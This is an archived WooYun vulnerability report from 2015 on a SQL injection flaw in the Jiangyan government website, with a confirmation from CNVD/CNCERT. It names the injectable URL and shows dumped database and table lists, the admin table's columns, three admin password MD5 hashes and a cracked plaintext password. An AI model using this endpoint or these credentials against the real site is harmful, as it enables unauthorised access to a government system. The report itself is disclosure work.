当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130851

漏洞标题:中国姜堰政府网站SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: dalamar

提交时间:2015-08-03 21:00

修复时间:2015-09-20 10:24

公开时间:2015-09-20 10:24

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

RT

详细说明:

中国姜堰政府网站SQL注入漏洞
注入地址:http://www.jys.gov.cn/public/js/count.php?i=262648

漏洞证明:

| pw_config                             |
| pw_creditlog |
| pw_credits |
| pw_customfield |
| pw_cwritedata |
| pw_datanalyse |
| pw_datastate |
| pw_datastore |
| pw_debatedata |
| pw_debates |
| pw_diary |
| pw_diarytype |
| pw_draft |
| pw_elements |
| pw_extragroups |
| pw_favors |
| pw_feed |
| pw_filter |
| pw_filter_class |
| pw_filter_dictionary |
| pw_focus |
| pw_forumdata |
| pw_forumlog |
| pw_forummsg |
| pw_forums |
| pw_forumsell |
| pw_forumsextra |
| pw_forumtype |
| pw_friends |
| pw_friendtype |
| pw_group_replay |
| pw_hack |
| pw_help |
| pw_invitecode |
| pw_inviterecord |
| pw_invoke |
| pw_invokepiece |
| pw_ipstates |
| pw_job |
| pw_jober |
| pw_medalinfo |
| pw_medalslogs |
| pw_medaluser |
| pw_membercredit |
| pw_memberdata |
| pw_memberinfo |
| pw_members |
| pw_memo |
| pw_modehot |
| pw_modules |
| pw_mpageconfig |
| pw_ms_attachs |
| pw_ms_configs |
| pw_ms_messages |
| pw_ms_relations |
| pw_ms_replies |
| pw_ms_searchs |
| pw_ms_tasks |
| pw_msg |
| pw_msgc |
| pw_msglog |
| pw_nav |
| pw_oboard |
| pw_online |
| pw_ouserdata |
| pw_overprint |
| pw_owritedata |
| pw_pagecache |
| pw_pageinvoke |
| pw_pcfield |
| pw_pcmember |
| pw_pcvalue1 |
| pw_pcvalue2 |
| pw_permission |
| pw_pidtmp |
| pw_pinglog |
| pw_plan |
| pw_polls |
| pw_postcate |
| pw_posts |
| pw_postsfloor |
| pw_poststopped |
| pw_privacy |
| pw_proclock |
| pw_pushdata |
| pw_pushpic |
| pw_rate |
| pw_rateconfig |
| pw_rateresult |
| pw_recycle |
| pw_report |
| pw_reward |
| pw_schcache |
| pw_setform |
| pw_share |
| pw_sharelinks |
| pw_singleright |
| pw_smiles |
| pw_space |
| pw_sqlcv |
| pw_stamp |
| pw_stopic |
| pw_stopicblock |
| pw_stopiccategory |
| pw_stopicpictures |
| pw_stopicunit |
| pw_styles |
| pw_tagdata |
| pw_tags |
| pw_task |
| pw_threads |
| pw_tmsgs |
| pw_toollog |
| pw_tools |
| pw_topiccate |
| pw_topicfield |
| pw_topicmodel |
| pw_topictype |
| pw_topicvalue1 |
| pw_topicvalue2 |
| pw_topicvalue3 |
| pw_topicvalue4 |
| pw_topicvalue5 |
| pw_topicvalue6 |
| pw_topicvalue7 |
| pw_topicvalue8 |
| pw_tpl |
| pw_tpltype |
| pw_trade |
| pw_tradeorder |
| pw_ucapp |
| pw_ucnotify |
| pw_ucsyncredit |
| pw_userapp |
| pw_userbinding |
| pw_usercache |
| pw_usergroups |
| pw_usertool |
| pw_voter |
| pw_weibo_cmrelations |
| pw_weibo_cnrelations |
| pw_weibo_comment |
| pw_weibo_content |
| pw_weibo_referto |
| pw_weibo_relations |
| pw_windcode |
| pw_wordfb |
| pw_write_smiles |
+---------------------------------------+
Database: jiangyan
[25 tables]
+---------------------------------------+
| bungmi_access |
| bungmi_admin |
| bungmi_answer |
| bungmi_answer_result |
| bungmi_article |
| bungmi_auth |
| bungmi_category |
| bungmi_config |
| bungmi_exam |
| bungmi_file |
| bungmi_group |
| bungmi_links |
| bungmi_page |
| bungmi_part |
| bungmi_partcode |
| bungmi_partdown |
| bungmi_participants |
| bungmi_partimage |
| bungmi_partlink |
| bungmi_parttext |
| bungmi_partvideo |
| bungmi_photo |
| bungmi_question |
| bungmi_question_item |
| bungmi_video |
+---------------------------------------+
Database: loyaa3
[46 tables]
+---------------------------------------+
| department |
| department2 |
| department_sort |
| functionlibrary |
| module_info |
| myzqk |
| news_category |
| news_collection |
| news_detail |
| news_extend |
| news_image |
| news_keyword |
| news_special |
| news_statistics |
| news_table |
| news_task |
| news_title |
| sub_client |
| sub_fee |
| sub_templates |
| system |
| templates_info |
| templates_team |
| tmp_click |
| upgrade |
| user_info |
| user_team |
| yz_ask_answer |
| yz_chat |
| yz_event |
| yz_exam |
| yz_gcxm_dw |
| yz_gcxm_gc |
| yz_gcxm_pj |
| yz_gcxm_ry |
| yz_gp_data |
| yz_gp_family |
| yz_guestbook |
| yz_information_publish |
| yz_mobile |
| yz_subscribe |
| yz_survey_data |
| yz_survey_module |
| yz_tmp_dc1 |
| yz_vote |
| yz_vote_data |
+---------------------------------------+
Database: old_jys_web
[10 tables]
+---------------------------------------+
| admin |
| diary |
| dospoll |
| info_cat |
| infos |
| no1 |
| ospoll |
| poll |
| spoll |
| zp |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: jys_gov_cn
[10 tables]
+---------------------------------------+
| admin |
| diary |
| dospoll |
| info_cat |
| infos |
| no1 |
| ospoll |
| poll |
| spoll |
| zp |
+---------------------------------------+


Database: jys_gov_cn
Table: admin
[8 columns]
+---------------+------------------+
| Column | Type |
+---------------+------------------+
| admin_caption | varchar(150) |
| admin_id | int(11) unsigned |
| admin_name | varchar(50) |
| admin_pass | varchar(32) |
| admin_time | datetime |
| admin_type | char(1) |
| admin_user | varchar(32) |
| author_id | int(11) unsigned |
+---------------+------------------+


Database: jys_gov_cn
Table: admin
[3 entries]
+----------------------------------+---------------+
| admin_pass | admin_name |
+----------------------------------+---------------+
| fb17403e1929d90c362c1f00e03299ca | <blank> |
| 4be185d60d63a3965347267f813f30d7 | <blank> |
| 187f1568e64af66c5da1dea0d2cf6ca1 | administrator |
+----------------------------------+---------------+


md5解密后为:jydzzw_16

修复方案:

你懂得

版权声明:转载请注明来源 dalamar@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-06 10:22

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无